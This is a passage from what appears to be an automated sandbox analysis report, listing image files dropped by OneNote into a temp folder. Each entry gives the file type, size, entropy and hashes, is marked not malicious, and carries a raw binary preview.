Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{A5BE5CB1-6DA1-4D29-8C96-E16CC32EAF3C}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{A6907DF1-6631-437C-93FB-5E6098231911}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{A767134E-C2DA-47A5-BC61-E7CCC501E26B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Temp\{A8EB0A0B-9CF0-4D15-86B8-7AB74264A4D6}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{A9A59522-7EEB-4004-8887-3AC5D394951F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{AB42E564-049D-4580-9B8A-2C0EE8DF745A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{AB67E66C-4E08-4719-8B2F-0A92960B8CB6}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Temp\{ACE17BFF-8A57-4775-B9BA-DAC8483DCDCE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{ACF01DFF-4EFA-4665-A7ED-7AA4BBD4BAFE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{AFB776A4-2A60-4D68-82D2-093D11D2A861}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{B26AC8D6-0627-4601-8519-2DD268D5433F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{B2C1DCDC-34A6-47EF-9F82-EB32E0512934}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{B34EE07E-13BC-47EF-91FD-9BF06694704E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{B439EC72-38D5-4A9F-8488-6224FF199322}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
